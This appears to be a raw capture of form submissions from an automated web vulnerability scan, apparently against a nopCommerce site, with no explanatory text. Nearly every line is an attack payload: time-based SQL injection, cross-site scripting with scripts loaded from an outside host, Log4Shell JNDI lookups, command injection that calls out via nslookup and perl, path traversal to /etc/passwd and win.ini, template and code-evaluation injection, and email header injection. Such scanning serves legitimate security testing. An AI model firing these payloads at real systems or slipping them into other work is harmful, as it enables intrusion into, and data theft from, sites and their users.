'.gethostbyname(lc('hitzx'.'tnnxhlgz269e3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(83).chr(114).chr(84).'
".gethostbyname(lc("hiteg"."leyjrxun86a78.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(66).chr(108).chr(68)."
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitaufssdtgpu1186b.'+'bxss.me')

'&&sleep(27*1000)*hwxxsn&&'
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitaufssdtgpu1186b."+"bxss.me")+'

"&&sleep(27*1000)*khpeso&&"
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitaufssdtgpu1186b.'+'bxss.me')+"

'||sleep(27*1000)*hhzqdu||'

"||sleep(27*1000)*ursvgy||"
-1 OR 2+690-690-1=0+0+0+1 --
-1 OR 2+319-319-1=0+0+0+1
-1' OR 2+951-951-1=0+0+0+1 --
"+"A".concat(70-3).concat(22*4).concat(97).concat(80).concat(97).concat(69)+(require"socket"Socket.gethostbyname("hitqt"+"osyfvihi9b44d.bxss.me.")[3].to_s)+"
-1' OR 2+661-661-1=0+0+0+1 or 'ZwSN6dCr'='
-1" OR 2+551-551-1=0+0+0+1 --
'+'A'.concat(70-3).concat(22*4).concat(108).concat(80).concat(101).concat(68)+(require'socket'Socket.gethostbyname('hitqk'+'tmxhatak1226d.bxss.me.')[3].to_s)+'
http://hitamslfxwgtt.bxss.me/

'"()&%<zzz><ScRiPt >OYip(9583)</ScRiPt>
'"()&%<zzz><ScRiPt >OYip(9027)</ScRiPt>

9438968
bfg1303<s1﹥s2ʺs3ʹhjl1303
bfgx9597%C0%BEz1%C0%BCz2a%90bcxhjl9597

<ScRiPt >OYip(9071)</ScRiPt>

<WVEOOX>L0XUO[!+!]</WVEOOX>

<ScRiPt >OYip(9318)</ScRiPt>

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9470></ScRiPt>

<isindex type=image src=1 onerror=OYip(9550)>

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9351'>

<body onload=OYip(9943)>

<img src=//xss.bxss.me/t/dot.gif onload=OYip(9820)>

<img src=xyz OnErRor=OYip(9073)>

<img/src=">" onerror=alert(9608)>
%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%4F%59%69%70%289509%29%3C%2F%73%43%72%69%70%54%3E

<ScRiPt>OYip(9500)</sCripT>
%F6<img zzz onmouseover=OYip(94051) //%F6>
rCI4Sx8c'; waitfor delay '0:0:15' --

<input autofocus onfocus=OYip(9561)>

}body{zzz:Expre/**/SSion(OYip(9870))}

eEg64<ScRiPt >OYip(9250)</ScRiPt>
GFTsKuQn'); waitfor delay '0:0:15' --

<WHDPGX>YBIAW[!+!]</WHDPGX>

<ifRAme sRc=9172.com></IfRamE>

<aCViOQx x=9216>

<img sRc='http://attacker-9257/log.php?

<a66C3PL<
PQnzx4bY')); waitfor delay '0:0:15' --
7yWpl9uw' OR 470=(SELECT 470 FROM PG_SLEEP(15))--
kBOW1uzs') OR 500=(SELECT 500 FROM PG_SLEEP(15))--
GlBrOnRL')) OR 515=(SELECT 515 FROM PG_SLEEP(15))--

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
@@qIsUt
555'"()&%<zzz><ScRiPt >LBa2(9792)</ScRiPt>
'"()&%<zzz><ScRiPt >LBa2(9337)</ScRiPt>
5559098742
bfg4106<s1﹥s2ʺs3ʹhjl4106
bfgx5901%C0%BEz1%C0%BCz2a%90bcxhjl5901
555<ScRiPt >LBa2(9517)</ScRiPt>
555<WYASTI>V62X0[!+!]</WYASTI>
555<script>LBa2(9715)</script>
555<ScR<ScRiPt>IpT>LBa2(9417)</sCr<ScRiPt>IpT>
555<ScRiPt >LBa2(9222)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9495></ScRiPt>
555<isindex type=image src=1 onerror=LBa2(9690)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9444'>
555<body onload=LBa2(9045)>
555<img src=//xss.bxss.me/t/dot.gif onload=LBa2(9439)>
555<img src=xyz OnErRor=LBa2(9386)>
555<img/src=">" onerror=alert(9622)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%4C%42%61%32%289979%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\LBa2(9244)\u003C/sCripT\u003E
555<ScRiPt>LBa2(9207)</sCripT>
%F6<img zzz onmouseover=LBa2(93381) //%F6>
555<input autofocus onfocus=LBa2(9853)>
555}body{zzz:Expre/**/SSion(LBa2(9552))}
555hdD9P<ScRiPt >LBa2(9318)</ScRiPt>
555<WTAHTL>QYNYK[!+!]</WTAHTL>
555<ifRAme sRc=9651.com></IfRamE>
555<alrrX0Y x=9836>
555<img sRc='http://attacker-9863/log.php?
555<aJyKbzK<
555'"()&%<zzz><ScRiPt >eX8k(9971)</ScRiPt>
'"()&%<zzz><ScRiPt >eX8k(9695)</ScRiPt>
5559908495
${j${::-n}di:dns${::-:}${::-/}/hitzhbmjmyhui46c82${::-.}bxss.me}zzzz
response.write(9812858*9735914)
'+response.write(9812858*9735914)+'
"+response.write(9812858*9735914)+"
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitigmrmjmotw326df${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-102895.1141.0d77d${::-.}1${::-.}bxss.me}}
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-102896&h=1141-0d77d-2&"></script>
echo lbnndv$()\ fdirhp\nz^xyu||a #' &echo lbnndv$()\ fdirhp\nz^xyu||a #|" &echo lbnndv$()\ fdirhp\nz^xyu||a #
giVNs3qs
&echo judubh$()\ nlsyuu\nz^xyu||a #' &echo judubh$()\ nlsyuu\nz^xyu||a #|" &echo judubh$()\ nlsyuu\nz^xyu||a #
|echo kgovdj$()\ iijxzs\nz^xyu||a #' |echo kgovdj$()\ iijxzs\nz^xyu||a #|" |echo kgovdj$()\ iijxzs\nz^xyu||a #
(nslookup hitxglmnpybhu53fbe.bxss.me||perl -e "gethostbyname('hitxglmnpybhu53fbe.bxss.me')")
$(nslookup hituipkoxaobzf8101.bxss.me||perl -e "gethostbyname('hituipkoxaobzf8101.bxss.me')")
&(nslookup hitcdzcxazeigcd49f.bxss.me||perl -e "gethostbyname('hitcdzcxazeigcd49f.bxss.me')")&'\"`0&(nslookup hitcdzcxazeigcd49f.bxss.me||perl -e "gethostbyname('hitcdzcxazeigcd49f.bxss.me')")&`'
555bcc:074625.1141-103013.1141.0d77d.19250.2@bxss.me
to@example.com>bcc:074625.1141-103014.1141.0d77d.19250.2@bxss.me
|(nslookup hitgsszbwugps44d0f.bxss.me||perl -e "gethostbyname('hitgsszbwugps44d0f.bxss.me')")
`(nslookup hittmaeztohkf82fb5.bxss.me||perl -e "gethostbyname('hittmaeztohkf82fb5.bxss.me')")`
;(nslookup hitxynxzwzobq2b8f6.bxss.me||perl -e "gethostbyname('hitxynxzwzobq2b8f6.bxss.me')")|(nslookup hitxynxzwzobq2b8f6.bxss.me||perl -e "gethostbyname('hitxynxzwzobq2b8f6.bxss.me')")&(nslookup hitxynxzwzobq2b8f6.bxss.me||perl -e "gethostbyname('hitxynxzwzobq2b8f6.bxss.me')")
${9999349+9999910}
555&n906428=v987254
-1 OR 2+814-814-1=0+0+0+1 --
-1 OR 2+932-932-1=0+0+0+1
-1' OR 2+924-924-1=0+0+0+1 --
-1' OR 2+431-431-1=0+0+0+1 or 'pM2lqwbO'='
-1" OR 2+848-848-1=0+0+0+1 --
'.gethostbyname(lc('hitdk'.'lrgtndtwe1417.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(65).chr(113).chr(83).'
".gethostbyname(lc("hitij"."fasivlin7b86a.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(86).chr(108).chr(77)."
555'&&sleep(27*1000)*gmuyyd&&'
555"&&sleep(27*1000)*ohlyjs&&"
555'||sleep(27*1000)*xmsbfp||'
555"||sleep(27*1000)*wwckbx||"
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitwmchrgdjlk5206c.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitwmchrgdjlk5206c."+"bxss.me")+'
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitwmchrgdjlk5206c.'+'bxss.me')+"
"+"A".concat(70-3).concat(22*4).concat(106).concat(89).concat(112).concat(86)+(require"socket"Socket.gethostbyname("hitqe"+"mzgvshrab1b25.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(101).concat(81).concat(107).concat(80)+(require'socket'Socket.gethostbyname('hitbi'+'zsuvkunl7a291.bxss.me.')[3].to_s)+'
http://hitsvyibficyi.bxss.me/
555'"()&%<zzz><ScRiPt >tsSs(9215)</ScRiPt>
'"()&%<zzz><ScRiPt >tsSs(9556)</ScRiPt>
5559665567
bfg3344<s1﹥s2ʺs3ʹhjl3344
bfgx8337%C0%BEz1%C0%BCz2a%90bcxhjl8337
555<ScRiPt >tsSs(9522)</ScRiPt>
555<WDEMXK>SVAQD[!+!]</WDEMXK>
555<script>tsSs(9962)</script>
555<ScR<ScRiPt>IpT>tsSs(9452)</sCr<ScRiPt>IpT>
555<ScRiPt >tsSs(9957)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9534></ScRiPt>
555<isindex type=image src=1 onerror=tsSs(9990)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9041'>
555<body onload=tsSs(9502)>
555<img src=//xss.bxss.me/t/dot.gif onload=tsSs(9704)>
555<img src=xyz OnErRor=tsSs(9506)>
555<img/src=">" onerror=alert(9933)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%74%73%53%73%289906%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\tsSs(9117)\u003C/sCripT\u003E
555<ScRiPt>tsSs(9111)</sCripT>
%F6<img zzz onmouseover=tsSs(99261) //%F6>
555<input autofocus onfocus=tsSs(9073)>
555}body{zzz:Expre/**/SSion(tsSs(9954))}
555ZK0td<ScRiPt >tsSs(9791)</ScRiPt>
555<WVSKBR>60FC0[!+!]</WVSKBR>
555<ifRAme sRc=9112.com></IfRamE>
555<aX47a7n x=9391>
555<img sRc='http://attacker-9978/log.php?
555<aEuOm6g<
0fTQzrAP'; waitfor delay '0:0:15' --
nsobPinl'); waitfor delay '0:0:15' --
M4jbISmY')); waitfor delay '0:0:15' --
-5 OR 431=(SELECT 431 FROM PG_SLEEP(15))--
-5) OR 122=(SELECT 122 FROM PG_SLEEP(15))--
-1)) OR 786=(SELECT 786 FROM PG_SLEEP(15))--
HTkPKEts' OR 444=(SELECT 444 FROM PG_SLEEP(15))--
jXrmsn5p') OR 405=(SELECT 405 FROM PG_SLEEP(15))--
xKyGOsM4')) OR 509=(SELECT 509 FROM PG_SLEEP(15))--
@@kfJu3
555'"()&%<zzz><ScRiPt >GT4O(9046)</ScRiPt>
555'"()&%<zzz><ScRiPt >Y4YM(9500)</ScRiPt>
'"()&%<zzz><ScRiPt >Y4YM(9881)</ScRiPt>
'"()&%<zzz><ScRiPt >GT4O(9834)</ScRiPt>
5559179902
5559734266
bfg10997<s1﹥s2ʺs3ʹhjl10997
bfg7842<s1﹥s2ʺs3ʹhjl7842
bfgx6186%C0%BEz1%C0%BCz2a%90bcxhjl6186
bfgx5685%C0%BEz1%C0%BCz2a%90bcxhjl5685
555<ScRiPt >Y4YM(9124)</ScRiPt>
555<ScRiPt >GT4O(9563)</ScRiPt>
555<WSNVGW>2GJDL[!+!]</WSNVGW>
555<W6PNIU>XQEQN[!+!]</W6PNIU>
555<script>Y4YM(9649)</script>
555<script>GT4O(9507)</script>
555<ScR<ScRiPt>IpT>GT4O(9548)</sCr<ScRiPt>IpT>
555<ScR<ScRiPt>IpT>Y4YM(9450)</sCr<ScRiPt>IpT>
555<ScRiPt >GT4O(9996)</ScRiPt>
555<ScRiPt >Y4YM(9298)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9188></ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9743></ScRiPt>
555<isindex type=image src=1 onerror=GT4O(9760)>
555<isindex type=image src=1 onerror=Y4YM(9492)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9314'>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9134'>
555<body onload=GT4O(9353)>
555<body onload=Y4YM(9628)>
555<img src=//xss.bxss.me/t/dot.gif onload=GT4O(9576)>
555<img src=//xss.bxss.me/t/dot.gif onload=Y4YM(9792)>
555<img src=xyz OnErRor=GT4O(9190)>
555<img src=xyz OnErRor=Y4YM(9718)>
555<img/src=">" onerror=alert(9065)>
555<img/src=">" onerror=alert(9375)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%47%54%34%4F%289082%29%3C%2F%73%43%72%69%70%54%3E
%35%35%35%3C%53%63%52%69%50%74%20%3E%59%34%59%4D%289987%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\Y4YM(9722)\u003C/sCripT\u003E
555\u003CScRiPt\GT4O(9397)\u003C/sCripT\u003E
555<ScRiPt>Y4YM(9382)</sCripT>
555<ScRiPt>GT4O(9945)</sCripT>
%F6<img zzz onmouseover=Y4YM(95931) //%F6>
%F6<img zzz onmouseover=GT4O(90191) //%F6>
555<input autofocus onfocus=GT4O(9555)>
555<input autofocus onfocus=Y4YM(9810)>
555}body{zzz:Expre/**/SSion(GT4O(9258))}
555}body{zzz:Expre/**/SSion(Y4YM(9803))}
555iU1XP<ScRiPt >GT4O(9788)</ScRiPt>
555kblrK<ScRiPt >Y4YM(9078)</ScRiPt>
555<WLQDQU>LDAZO[!+!]</WLQDQU>
555<WQ8WPH>CLKIY[!+!]</WQ8WPH>
555<ifRAme sRc=9765.com></IfRamE>
555<ifRAme sRc=9439.com></IfRamE>
555<aHlEwOz x=9632>
555<a8NUBPN x=9834>
555<img sRc='http://attacker-9663/log.php?
555<img sRc='http://attacker-9867/log.php?
555<aJGLBQf<
555<aDjT2FY<
555'"()&%<zzz><ScRiPt >Q11f(9631)</ScRiPt>
'"()&%<zzz><ScRiPt >Q11f(9564)</ScRiPt>
5559041887
bfg4070<s1﹥s2ʺs3ʹhjl4070
bfgx9501%C0%BEz1%C0%BCz2a%90bcxhjl9501
555<ScRiPt >Q11f(9333)</ScRiPt>
555<WCABO4>SS2GM[!+!]</WCABO4>
555<script>Q11f(9561)</script>
555<ScR<ScRiPt>IpT>Q11f(9651)</sCr<ScRiPt>IpT>
555<ScRiPt >Q11f(9925)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9216></ScRiPt>
555<isindex type=image src=1 onerror=Q11f(9724)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9700'>
555<body onload=Q11f(9367)>
555<img src=//xss.bxss.me/t/dot.gif onload=Q11f(9231)>
555<img src=xyz OnErRor=Q11f(9572)>
555<img/src=">" onerror=alert(9476)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%51%31%31%66%289392%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\Q11f(9760)\u003C/sCripT\u003E
555<ScRiPt>Q11f(9234)</sCripT>
%F6<img zzz onmouseover=Q11f(99111) //%F6>
555<input autofocus onfocus=Q11f(9385)>
555}body{zzz:Expre/**/SSion(Q11f(9559))}
555hWSSF<ScRiPt >Q11f(9912)</ScRiPt>
555<W9IHRE>TJQPM[!+!]</W9IHRE>
555<ifRAme sRc=9158.com></IfRamE>
555<awxJb1p x=9272>
555<img sRc='http://attacker-9084/log.php?
555<a3XVixU<
This is a sample comment...
555
1HmkNHcEO
response.write(9546467*9544260)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
${j${::-n}di:dns${::-:}${::-/}/hitjogrkezlwbb9a1e${::-.}bxss.me}zzzz
echo lpwshk$()\ wrvhen\nz^xyu||a #' &echo lpwshk$()\ wrvhen\nz^xyu||a #|" &echo lpwshk$()\ wrvhen\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-917&h=1141-0d77d-2&"></script>
pl4rzJGS
555
555
'+response.write(9546467*9544260)+'
555
bcc:074625.1141-929.1141.0d77d.19250.2@bxss.me
555
555
555
../../../../../../../../../../../../../../windows/win.ini
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitjumrygobtfa5bd3${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
&echo qlyrno$()\ hlojmn\nz^xyu||a #' &echo qlyrno$()\ hlojmn\nz^xyu||a #|" &echo qlyrno$()\ hlojmn\nz^xyu||a #
to@example.com>
bcc:074625.1141-937.1141.0d77d.19250.2@bxss.me
"+response.write(9546467*9544260)+"
555<esi:include src="http://bxss.me/rpb.png"/>
555
file:///etc/passwd
${9999303+9999928}
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-942.1141.0d77d${::-.}1${::-.}bxss.me}}
555
|echo usywan$()\ kgrniv\nz^xyu||a #' |echo usywan$()\ kgrniv\nz^xyu||a #|" |echo usywan$()\ kgrniv\nz^xyu||a #
555
-1 OR 2+535-535-1=0+0+0+1 --
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555&n986111=v975440
../555
)
(nslookup hitudbdorftko05c41.bxss.me||perl -e "gethostbyname('hitudbdorftko05c41.bxss.me')")
-1 OR 2+275-275-1=0+0+0+1
555
555
555
'.gethostbyname(lc('hityo'.'vryehjso3141c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(75).chr(103).chr(80).'
555
555
-1' OR 2+624-624-1=0+0+0+1 --
555
!(()&&!|*|*|
Http://bxss.me/t/fit.txt
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
$(nslookup hitxpeztjmnkrc7fb1.bxss.me||perl -e "gethostbyname('hitxpeztjmnkrc7fb1.bxss.me')")
555
555
".gethostbyname(lc("hitkb"."qgmwicqfba641.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(89).chr(111).chr(85)."
555
'"()
-1' OR 2+207-207-1=0+0+0+1 or 'TN3S7X4C'='
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hiteklquuttjcddb1f.'+'bxss.me')
^(#$!@#$)(()))******
http://bxss.me/t/fit.txt?.jpg
';print(md5(31337));$a='
555
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hiteklquuttjcddb1f."+"bxss.me")+'
555
&(nslookup hitigsctcncfeeea18.bxss.me||perl -e "gethostbyname('hitigsctcncfeeea18.bxss.me')")&'\"`0&(nslookup hitigsctcncfeeea18.bxss.me||perl -e "gethostbyname('hitigsctcncfeeea18.bxss.me')")&`'
555
/etc/shells
555
555
";print(md5(31337));$a="
-1" OR 2+971-971-1=0+0+0+1 --
HttP://bxss.me/t/xss.html?%00
555
555
555
c:/windows/win.ini
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hiteklquuttjcddb1f.'+'bxss.me')+"
if(now()=sysdate(),sleep(15),0)
${@print(md5(31337))}
bxss.me/t/xss.html?%00
|(nslookup hithrfrafxcajbc1e1.bxss.me||perl -e "gethostbyname('hithrfrafxcajbc1e1.bxss.me')")
555
555
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
${@print(md5(31337))}\
555
555
bxss.me
`(nslookup hitovtakcqzux27bf8.bxss.me||perl -e "gethostbyname('hitovtakcqzux27bf8.bxss.me')")`
"+"A".concat(70-3).concat(22*4).concat(107).concat(88).concat(103).concat(79)+(require"socket"
Socket.gethostbyname("hitwm"+"chxqzxta1a9ee.bxss.me.")[3].to_s)+"
555'&&sleep(27*1000)*lztsov&&'
about-nopcommerce
555
555
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
'.print(md5(31337)).'
555"&&sleep(27*1000)*thbkcb&&"
;(nslookup hitdyzybwscmed2b4f.bxss.me||perl -e "gethostbyname('hitdyzybwscmed2b4f.bxss.me')")|(nslookup hitdyzybwscmed2b4f.bxss.me||perl -e "gethostbyname('hitdyzybwscmed2b4f.bxss.me')")&(nslookup hitdyzybwscmed2b4f.bxss.me||perl -e "gethostbyname('hitdyzybwscmed2b4f.bxss.me')")
'+'A'.concat(70-3).concat(22*4).concat(111).concat(90).concat(103).concat(75)+(require'socket'
Socket.gethostbyname('hitdz'+'usavleph05cd0.bxss.me.')[3].to_s)+'
http://hitdnahblzzxc.bxss.me/
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555'||sleep(27*1000)*oucyhs||'
about-nopcommerce/.
555
555
555
-1; waitfor delay '0:0:15' --
555
555
555"||sleep(27*1000)*kyyvmm||"
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
-1); waitfor delay '0:0:15' --
555
555
555
555
-1)); waitfor delay '0:0:15' --
555
555
555
555
/xfs.bxss.me
555
555
555
1 waitfor delay '0:0:15' --
555
'"
555
555
bWBSCaHc'; waitfor delay '0:0:15' --
555
555
555
555
<!--
555
jyOeFEAT'); waitfor delay '0:0:15' --
555'"()&%<zzz><ScRiPt >5mEB(9566)</ScRiPt>
555
555
6QjWwjKI')); waitfor delay '0:0:15' --
555
-5 OR 912=(SELECT 912 FROM PG_SLEEP(15))--
555
'"()&%<zzz><ScRiPt >5mEB(9907)</ScRiPt>
555
-5) OR 473=(SELECT 473 FROM PG_SLEEP(15))--
555
555
-1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))--
555
555
5559008272
555
1XqJd7A6' OR 252=(SELECT 252 FROM PG_SLEEP(15))--
555
63tjZJlq') OR 879=(SELECT 879 FROM PG_SLEEP(15))--
cJcR46L7')) OR 255=(SELECT 255 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
bfg8200<s1﹥s2ʺs3ʹhjl8200
1'"
bfgx4997%C0%BEz1%C0%BCz2a%90bcxhjl4997
@@5awOq
555
<%={{={@{#{${dfb}}%>
555
555
555
555
555
555
555
<th:t="${dfb}#foreach
555
555
555
555
555
555
555
555
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
555
555
555'"()&%<zzz><ScRiPt >yBnv(9793)</ScRiPt>
555
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-1252&h=1141-0d77d-2&"></script>
response.write(9851917*9152367)
echo qwsoye$()\ ndpuoe\nz^xyu||a #' &echo qwsoye$()\ ndpuoe\nz^xyu||a #|" &echo qwsoye$()\ ndpuoe\nz^xyu||a #
${j${::-n}di:dns${::-:}${::-/}/hitqwiqoscycl192d3${::-.}bxss.me}zzzz
sqq3P3vx
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
'+response.write(9851917*9152367)+'
555
../../../../../../../../../../../../../../etc/passwd
555
bcc:074625.1141-1257.1141.0d77d.19250.2@bxss.me
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitheqadtzxhg5f31b${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
&echo hwpxmb$()\ rqywaj\nz^xyu||a #' &echo hwpxmb$()\ rqywaj\nz^xyu||a #|" &echo hwpxmb$()\ rqywaj\nz^xyu||a #
555
dfb{{98991*97996}}xca
"+response.write(9851917*9152367)+"
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
to@example.com>
bcc:074625.1141-1262.1141.0d77d.19250.2@bxss.me
|echo gmizvc$()\ fxggis\nz^xyu||a #' |echo gmizvc$()\ fxggis\nz^xyu||a #|" |echo gmizvc$()\ fxggis\nz^xyu||a #
555
555
file:///etc/passwd
555<esi:include src="http://bxss.me/rpb.png"/>
${10000057+10000182}
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-1263.1141.0d77d${::-.}1${::-.}bxss.me}}
'"()&%<zzz><ScRiPt >yBnv(9132)</ScRiPt>
555
555
-1 OR 2+375-375-1=0+0+0+1 --
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
(nslookup hitkymyvxxlzd7a361.bxss.me||perl -e "gethostbyname('hitkymyvxxlzd7a361.bxss.me')")
555
555
555
-1 OR 2+93-93-1=0+0+0+1
../555
555
555&n968694=v967581
)
555
555
$(nslookup hitcvfhlxcjgc37e34.bxss.me||perl -e "gethostbyname('hitcvfhlxcjgc37e34.bxss.me')")
-1' OR 2+454-454-1=0+0+0+1 --
dfb[[${98991*97996}]]xca
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
!(()&&!|*|*|
Http://bxss.me/t/fit.txt
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitauhuivijeda608f.'+'bxss.me')
555
'.gethostbyname(lc('hitsp'.'evnegvcl81af6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(66).chr(122).chr(74).'
555
-1' OR 2+49-49-1=0+0+0+1 or '8nPGKzHo'='
5559570984
^(#$!@#$)(()))******
';print(md5(31337));$a='
555
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitauhuivijeda608f."+"bxss.me")+'
555
&(nslookup hitgfanbtkigg6c258.bxss.me||perl -e "gethostbyname('hitgfanbtkigg6c258.bxss.me')")&'\"`0&(nslookup hitgfanbtkigg6c258.bxss.me||perl -e "gethostbyname('hitgfanbtkigg6c258.bxss.me')")&`'
".gethostbyname(lc("hitho"."bhcxozdd71feb.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(89).chr(110).chr(68)."
http://bxss.me/t/fit.txt?.jpg
555
HttP://bxss.me/t/xss.html?%00
555
555
555
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitauhuivijeda608f.'+'bxss.me')+"
-1" OR 2+732-732-1=0+0+0+1 --
|(nslookup hitpiennimshn50069.bxss.me||perl -e "gethostbyname('hitpiennimshn50069.bxss.me')")
555
/etc/shells
";print(md5(31337));$a="
555
dfb__${98991*97996}__::.x
bxss.me/t/xss.html?%00
555
555
555
555
'"()
"+"A".concat(70-3).concat(22*4).concat(120).concat(72).concat(120).concat(77)+(require"socket"
Socket.gethostbyname("hittq"+"qgbsrwvr185f6.bxss.me.")[3].to_s)+"
c:/windows/win.ini
${@print(md5(31337))}
555
`(nslookup hitqoucsjmckj35cba.bxss.me||perl -e "gethostbyname('hitqoucsjmckj35cba.bxss.me')")`
555
555
555
555
555
if(now()=sysdate(),sleep(15),0)
555
${@print(md5(31337))}\
555
'+'A'.concat(70-3).concat(22*4).concat(100).concat(68).concat(107).concat(81)+(require'socket'
Socket.gethostbyname('hitpq'+'gcumhxpx3be63.bxss.me.')[3].to_s)+'
about-nopcommerce
http://hitvjyxskwuzl.bxss.me/
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
;(nslookup hitcvrdyjhrpq38992.bxss.me||perl -e "gethostbyname('hitcvrdyjhrpq38992.bxss.me')")|(nslookup hitcvrdyjhrpq38992.bxss.me||perl -e "gethostbyname('hitcvrdyjhrpq38992.bxss.me')")&(nslookup hitcvrdyjhrpq38992.bxss.me||perl -e "gethostbyname('hitcvrdyjhrpq38992.bxss.me')")
555
bxss.me
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555
555
about-nopcommerce/.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
/xfs.bxss.me
555
555
555
555
555'&&sleep(27*1000)*vviriv&&'
555<ScRiPt >5mEB(9559)</ScRiPt>
555'"()&%<zzz><ScRiPt >QVPX(9341)</ScRiPt>
555
555
555
555
'"
